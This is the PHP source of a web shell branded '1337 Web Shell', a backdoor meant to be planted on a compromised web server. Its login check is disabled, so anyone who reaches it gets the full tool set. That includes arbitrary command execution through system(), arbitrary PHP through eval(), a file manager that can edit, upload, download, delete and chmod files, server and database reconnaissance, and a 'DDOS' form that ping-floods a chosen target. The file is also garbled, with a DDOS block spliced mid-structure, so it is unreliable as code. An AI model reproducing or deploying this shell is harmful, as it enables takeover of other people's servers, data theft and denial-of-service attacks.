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- <?php
- $xpass = '662f707d5491e9bce8238a6c0be92190'; //password for access in sha1 ("root" as default)
- /*****[COLOR CONFIG]*****/
- $text = '#FF0000'; //text color
- $background = '#1A1A1A'; //background color
- /*****[PHP CONFIG]*****/
- @set_time_limit(0);
- @ini_set('max_execution_time',0);
- @ignore_user_abort(1);
- /*****[CODE START]*****/
- $self = $_SERVER['PHP_SELF'];
- $act = $_GET['action'];
- $user = $_ENV['USERNAME'];
- /*****[AUTH CODE]*****/
- $pass = $_POST['xpass'];
- $login = "
- <title>1337 Web Shell</title>
- <center>Enter Password:<br>
- <form method='POST' action=".$self.">
- <input type='password' name='xpass'><br><input type='submit'></form>";
- if(isset($pass))
- {
- setcookie("1337", $pass, time()+86400);
- print ("<META http-equiv='refresh' content='0'>");
- }
- if (1 != 1)
- {
- print ($login);
- }
- else
- {
- if (isset($_POST['1337_DIR']))
- {
- $x = $_POST['1337_DIR'];
- setcookie("1337_DIR", $x, time()+86400);
- print ("<META http-equiv='refresh' content='0'>");
- }
- elseif ($act !== "load")
- {
- /*****[MAIN]*****/
- if (ini_get("safe_mode") or strtolower(ini_get("safe_mode")) == "on"){$smode = "ON";}else{$smode = "OFF";}
- print ("
- <title>1337 Web Shell</title>
- <META http-equiv='expires' content='0'>
- <head><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head>
- <body text='".$text."' bgcolor='".$background."' link='".$text."' vlink='".$text."' alink='".$text."'>
- <center><b><font size='5'>1337 WEB SHELL</b>
- </font></b></div>
- <div align='center'>
- <table border='1' width='70%' bordercolorlight='".$text."' cellspacing='0' id='table1'>
- <tr><td colspan='2'><font style='font-size: 11.5pt'>
- System: ".php_uname()."<br>
- Server: ".$_SERVER['SERVER_SOFTWARE']."<br>
- Safe mode: ".$smode."<br>
- Host info: ".$_SERVER['HTTP_HOST'].' - '.$_SERVER['SERVER_ADDR']."
- </font></tr><tr><td>
- <a href='".$self."'>Shell</a>
- <a href='".$self."?action=serverinfo'>ServInfo</a>
- <a href='".$self."?action=files'>Files</a>
- <a href='".$self."?action=eval'>PHP</a>
- <a href='".$self."?action=xpack'>X-toolz</a>
- <a href='".$self."?action=ddos'>DDOS</a>
- </td></tr><tr><td>");
- /*****[DDOS]*****/
- elseif($act == "ddos")
- {
- <body bgcolor="#000000">
- <font face="Courier New" color="green">
- <center>Enter Target<br>
- <form method="POST">
- <input type="text" name="ip" value=''>
- <input type="submit" value="fire"></center>
- <?php
- $v = $_POST['ip'];
- $c = 'ping -f $v';
- shell_exec($c);
- ?>
- /*****[SERVER INFO]*****/
- if ($act == "serverinfo")
- {
- if(function_exists('curl_version')>0){$curl = "ON";}else{$curl = "OFF";}
- (($disabled=ini_get('disable_functions'))==')?$disabled='NO':str_replace(array(',',';'), ', ', $disabled);
- if(get_magic_quotes_gpc()>0){$mq="ON";}else{$mq="OFF";}
- if(function_exists('apache_get_modules')>0){$apache=implode(', ',apache_get_modules());}
- if(function_exists('get_loaded_extensions')>0){$phprun=implode(', ',get_loaded_extensions());}
- if(function_exists('gzencode')>0){$gzip="ON";}else{$gzip="OFF";}
- if(function_exists('mysql_connect')>0){$mysql="ON";}else{$mysql="OFF";}
- if(function_exists('mssql_connect')>0){$mssql="ON";}else{$mssql="OFF";}
- if(function_exists('pg_connect')>0){$PostgreSQL="ON";}else{$PostgreSQL="OFF";}
- if(function_exists('ocilogon')>0){$Oracle="ON";}else{$Oracle="OFF";}
- print("
- <table><td>
- <b>User:</b> " . $user ."<br>
- <b>cURL:</b> " . $curl. "<br>
- <b>gZip:</b> " . $gzip. "<br>
- <b>MySQL:</b> " . $mysql. "<br>
- <b>MsSQL:</b> " . $mssql. "<br>
- <b>PostgreSQL:</b> " . $PostgreSQL. "<br>
- <b>Oracle:</b> " . $Oracle. "<br>
- <b>Magic Quotes:</b> ". $mq ."<br>
- <b>Disabled PHP functions:</b> " . $disabled ."<br>
- <b>PHP Modules:</b> " . $phprun ."<br>
- <b>Apache Modules:</b> " . $apache ."<br>");
- }
- /*****[PHP Eval]*****/
- elseif($act == "eval")
- {
- $eval=$_POST['eval'];
- print("
- <table><form action='".$self."?action=eval' method='POST'><tr><td>
- <textarea name='eval' style='color: ".$text."; background-color: ".$background."' cols='82' rows='10'></textarea>
- <input type='submit' value='eXecute' style='color: ".$text."; background-color: ".$background."'></td></tr>
- <td style='border-style: solid; border-width: 1px'>");
- if(isset($eval))
- {
- $eval=str_replace('\"', "'", $eval);
- eval($eval);
- }
- }
- /*****[ENCODER]*****/
- elseif($act == "encoder")
- {
- $code=$_POST['code'];
- print("
- <table>
- <form method='POST'>
- <tr><td><input size='80' style='color: ".$text."; background-color: ".$background."' name='code'>
- <input type='submit' value='enc0de' style='color: ".$text."; background-color: ".$background."'>
- </td></tr>");
- if(isset($code))
- {
- print ("
- <tr><td>
- Text: ". $code ."<br>
- Base 64 encoded: ".base64_encode($code)."<br>
- Base 64 decoded: ".base64_decode($code)."<br>
- Hex encoded text: ".bin2hex($code)."<br>
- Hex decoded text: ".@htmlspecialchars(pack("H*",$code))."<br>
- MD5 encoded text: ".md5($code)."<br>
- MD5 decoded text: <a href='".$code."'>view</a><br>
- SHA1 encoded text: ".sha1($code)."<br></td>");
- }
- }
- /*****[X-PACK]*****/
- elseif($act == "xpack")
- {
- print("<center>
- <a href='".$self."?action=encoder'>Encoder</a><br>
- ");
- }
- /*****[FILES]*****/
- elseif($act == "files")
- {
- if (isset($_COOKIE['1337_DIR']))
- {
- $x = $_COOKIE['1337_DIR'];
- }
- else
- {
- $x = dirname($_SERVER['SCRIPT_FILENAME']);
- }
- $xdir=@chdir($x);
- if($_GET["view"] !== NULL)
- {
- $view=$_GET["view"];
- ob_clean();
- $z = file_get_contents($view);
- print("
- <table>
- <tr><td>
- <a href='javascript:history.back();'>Go back</a>
- <form method='POST'>
- <textarea name='content' style='color: ".$text."; background-color: ".$background."' cols='82' rows='20'>");
- print (str_replace('</textarea>', '<//textarea>', $z));
- print ("</textarea><br><input type='submit' value='Save' style='color: ".$text."; background-color: ".$background."'></form>");
- if(isset($_POST['content']))
- {
- $content = $_POST['content'];
- $content = str_replace("<//textarea>", "</textarea>", $content);
- $content = str_replace('\"', '"', $content);
- $content = str_replace("\'", "'", $content);
- $f = fopen($view, 'w');
- fputs ($f, $content);
- fclose ($f);
- print ("<META http-equiv='refresh' content='0'>");
- }
- }
- elseif($_GET["up"] !== NULL)
- {
- print("<center><b>Upload!<br></b><form enctype='multipart/form-data' action='".$self."?action=files' method='POST'>
- <input type='file' style='color: ".$text."; background-color: ".$background."' size='40' name='upl' style='color: ".$text."; background-color: ".$background."'><br>
- TO: <input type='text' name='dir' size='40' style='color: ".$text."; background-color: ".$background."' value=".$x.">
- <input type='submit' style='color: ".$text."; background-color: ".$background."' value='GO!'></form>");
- }
- elseif($_GET["md"] !== NULL)
- {
- print("<form method='POST' action='".$self."?action=files'>
- <center><b>Make dir!</b><br><input type='text' style='color: ".$text."; background-color: ".$background."' name='makedir'>
- <input type='submit' value='make' style='color: ".$text."; background-color: ".$background."'></form>");
- }
- elseif($_GET["deletef"] !== NULL)
- {
- if(@unlink($_GET["deletef"]))
- {
- print ("<center>File \"".$_GET['deletef']."\" successful deleted!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
- }
- else
- {
- print ("<center>File \"".$_GET['deletef']."\" can`t be deleted!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
- }
- }
- elseif($_GET["deleted"] !== NULL)
- {
- if(@rmdir($_GET["deleted"]))
- {
- print ("<center>Dir \"".$_GET['deleted']."\" successful deleted!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
- }
- else
- {
- print ("<center>Dir \"".$_GET['deleted']."\" can`t be deleted!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
- }
- }
- elseif($_GET["rename"] !== NULL)
- {
- if(isset($_POST['rename']))
- {
- @rename($_GET['rename'], $_POST['rename']) or die ("<center>".$_GET['rename']."\" can`t be renamed to".$_POST['rename']."!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
- print ("<center>".$_GET['rename']."\" successful renamed to".$_POST['rename']."!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
- }
- else
- {
- print ("<center>Rename ".$_GET['rename']."<br><form method='POST'>to:
- <input size='45' value='".dirname($_GET['rename'])."/' name='rename' style='color: ".$text."; background-color: ".$background."'>
- <input type='submit' value='Rename' style='color: ".$text."; background-color: ".$background."'>");
- }
- }
- elseif($_GET["chmod"] !== NULL)
- {
- if(isset($_POST['chmod']))
- {
- @chmod($_GET['chmod'], $_POST['chmod']) or die ("<center>Chmod for ".$_GET['chmod']." can`t be changed to ".$_POST['chmod']."!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
- print ("<center>Chmod for ".$_GET['chmod']." successful changed to ".$_POST['chmod']."!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
- }
- else
- {
- print ("<center>Chmod ".$_GET['cmod']."<br><form method='POST'>
- <input size='45' value='0777' name='chmod' style='color: ".$text."; background-color: ".$background."'>
- <input type='submit' value='Chmod' style='color: ".$text."; background-color: ".$background."'>");
- }
- }
- elseif($_POST["makedir"] !== NULL)
- {
- if(@mkdir($_POST["makedir"]))
- {
- print ("<center>Dir \"".$_POST["makedir"]."\" successful created!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
- }
- else
- {
- print ("<center>Dir \"".$_POST["makedir"]."\" can`t be created!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
- }
- }
- elseif (isset($HTTP_POST_FILES["upl"]))
- {
- if(@copy($HTTP_POST_FILES["upl"]["tmp_name"],
- $_POST['dir']."/".$HTTP_POST_FILES["upl"]["name"]))
- {
- print("<center>File \"".$HTTP_POST_FILES["upl"]["name"]."\" successful uploaded<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
- }
- else
- {
- print("<center>File \"".$HTTP_POST_FILES["upl"]["name"]."\" can`t be uploaded<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
- }
- }
- else
- {
- function chmodr($name)
- {
- if (fileperms($name) & 00400){print "r";}else{print "-";}
- if (fileperms($name) & 00200){print "w";}else{print "-";}
- if (fileperms($name) & 00100){print "x";}else{print "-";}
- print ("/");
- if (fileperms($name) & 00040){print "r";}else{print "-";}
- if (fileperms($name) & 00020){print "w";}else{print "-";}
- if (fileperms($name) & 00010){print "x";}else{print "-";}
- print ("/");
- if (fileperms($name) & 00004){print "r";}else{print "-";}
- if (fileperms($name) & 00002){print "w";}else{print "-";}
- if (fileperms($name) & 00001){print "x";}else{print "-";}
- }
- if (PHP_OS != "WINNT"){$nowin = 1;}
- if (!($dir = @opendir($x)))
- {
- die ("<center>Access denied on <b>".$x."<b><br><table><td><form method='POST'>
- <input type='hidden' name='1337_DIR' value=".dirname($_SERVER['SCRIPT_FILENAME']).">
- <input type='submit' value='Go home' style='color: ".$text."; background-color: ".$background."'>
- </form>");
- }
- print ("<table width='695'><td colspan='6'><table><td><form method='POST'>
- <input size='63' style='color: ".$text."; background-color: ".$background."' name='1337_DIR' value=".$x.">
- <input type='submit' value='Go!' style='color: ".$text."; background-color: ".$background."'>
- </form>
- </table></center> <tr>
- <td width='40'>Type/Name<td width='16'>Size(Byte)<td width='80'>Perms<td width='20'>Owner<td width='20'>Group<td width='20'> <tr>");
- print ("<td width='40'>dir <b>.</b><td width='25'>---<td width='80'>");
- chmodr($x."/.");
- print ("<td width='20'>"); if(isset($nowin)){$k=posix_getpwuid(fileowner($x."/.")); print($k[name]);}else{print("---");} print("<td width='20'>"); if(isset($nowin)){$k=posix_getgrgid(filegroup($x."/.")); print($k[name]);}else{print("---");} print("<td width='200'>");
- print ("<a href='".$self."?action=files&deleted=".$x."/.'>Delete</a> | <a href='".$self."?action=files&rename=".$x."/.'>Rename</a> | <a href='".$self."?action=files&chmod=".$x."/.'>Chmod</a><tr>");
- print ("<td width='40'>dir <b>..</b><td width='25'>---<td width='80'>");
- chmodr($x."/..");
- print ("<td width='20'>"); if(isset($nowin)){$k=posix_getpwuid(fileowner($x."/..")); print($k[name]);}else{print("---");} print("<td width='20'>"); if(isset($nowin)){$k=posix_getgrgid(filegroup($x."/..")); print($k[name]);}else{print("---");} print("<td width='200'>");
- print ("<a href='".$self."?action=files&deleted=".$x."/.'>Delete</a> | <a href='".$self."?action=files&rename=".$x."/..'>Rename</a> | <a href='".$self."?action=files&chmod=".$x."/..'>Chmod</a><tr>");
- while($name = readdir($dir))
- {
- if (is_dir($name))
- {
- if ($name !== "." and $name !== "..")
- {
- print ("<td width='40'>dir <b>".$name."</b><td width='25'>---<td width='80'>");
- chmodr($name);
- print ("<td width='20'>"); if(isset($nowin)){$k=posix_getpwuid(fileowner($name)); print($k[name]);}else{print("---");} print("<td width='20'>"); if(isset($nowin)){$k=posix_getgrgid(filegroup($name)); print($k[name]);}else{print("---");} print("<td width='200'>");
- print ("<a href='".$self."?action=files&deleted=".$x."/".$name."'>Delete</a> | <a href='".$self."?action=files&rename=".$x."/".$name."'>Rename</a> | <a href='".$self."?action=files&chmod=".$x."/".$name."'>Chmod</a><tr>");
- }
- }
- }
- $dir = @opendir($x);
- while($name = readdir($dir))
- {
- if (!is_dir($name))
- {
- print ("<td width='40'>".filetype($name)." ".$name."<td width='25'>".filesize($name)."<td width='80'>");
- chmodr($name);
- print ("<td width='20'>"); if(isset($nowin)){$k=posix_getpwuid(fileowner($name)); print($k[name]);}else{print("---");} print("<td width='20'>"); if(isset($nowin)){$k=posix_getgrgid(filegroup($name)); print($k[name]);}else{print("---");} print("<td width='200'>");
- print ("<a href='".$self."?action=load&load=".$x."/".$name."'>Load</a> | <a href='".$self."?action=files&view=".$x."/".$name."'>Edit</a> | <a href='".$self."?action=files&deletef=".$x."/".$name."'>Delete</a> | <a href='".$self."?action=files&rename=".$x."/".$name."'>Rename</a> | <a href='".$self."?action=files&chmod=".$x."/".$name."'>Chmod</a><tr>");
- }
- }
- print ("
- </td><tr></td></td><tr></td><tr><td colspan='6' rowspan='2'><center><b><a href='".$self."?action=files&md'>Make Directory</a><br><a href='".$self."?action=files&up'>Uploader</a></b></td>
- ");
- }
- }
- /*****[SHELL]*****/
- else
- {
- print("
- <table>
- <form action='".$self."' method='POST'>
- <tr><td>
- <input size='80' style='color: ".$text."; background-color: ".$background."' name='cmd'><input type='submit' value='eXecute' style='color: ".$text."; background-color: ".$background."'>
- </td></tr><tr><td>
- <textarea style='color: ".$text."; background-color: ".$background."' cols='82' rows='20'>");
- if (isset($_POST['cmd']))
- {
- system($_POST['cmd']);
- }
- print ("</textarea>");
- }
- }
- /*****[FILE DOWNLOAD]*****/
- else
- {
- $load=$_GET["load"];
- ob_clean();
- header("Content-type: application/octet-stream/".filetype($load));
- header("Content-length: ".filesize($load));
- header("Content-disposition: attachment; filename=".$load);
- $z = file_get_contents($load);
- print $z;
- exit;
- }
- }
- /*****[ GOOD LUCK =) ]*****/
- ?>
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